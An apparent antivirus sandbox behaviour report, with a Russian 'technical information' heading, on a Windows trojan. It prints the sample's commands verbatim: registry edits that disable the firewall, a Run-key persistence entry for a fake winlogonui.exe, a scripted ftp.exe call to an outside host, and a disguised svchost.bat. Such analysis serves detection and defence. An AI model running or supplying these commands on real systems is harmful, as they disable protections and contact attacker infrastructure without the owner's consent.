Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'winlogonui.exe' = ''
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DisableNotifications' = '00000001'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
- <SYSTEM32>\find.exe /i "TTL="
- <SYSTEM32>\ftp.exe -v -n -i -s:%WINDIR%\syscpl\comenzi.txt csisoftware.ilive.ro
- <SYSTEM32>\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v winlogonui.exe /t REG_EXPAND_SZ /d %WINDIR%\syscpl\winlogonui.exe /f
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\svchost.bat" "
- %WINDIR%\regedit.exe /S "%HOMEPATH%\Local Settings\Temp.\DefOpen.reg"
- <SYSTEM32>\ping.exe -n 1 google.com
- %TEMP%\1.tmp\svchost.bat
- %TEMP%\DefOpen.reg
- %WINDIR%\syscpl\comenzi.txt
- %TEMP%\1.tmp\b2e
- %TEMP%\1.tmp\b2e.dll
- %TEMP%\1.tmp\binaries.txt
- %WINDIR%\syscpl\comenzi.txt
- %TEMP%\1.tmp\svchost.bat
- %TEMP%\1.tmp\b2e.dll
- %TEMP%\1.tmp\binaries.txt
- %TEMP%\1.tmp\b2e
- %TEMP%\DefOpen.reg
- 'localhost':1040
- 'cs#####ware.ilive.ro':21
- DNS ASK cs#####ware.ilive.ro
- DNS ASK google.com
- ClassName: 'RegEdit_RegEdit' WindowName: ''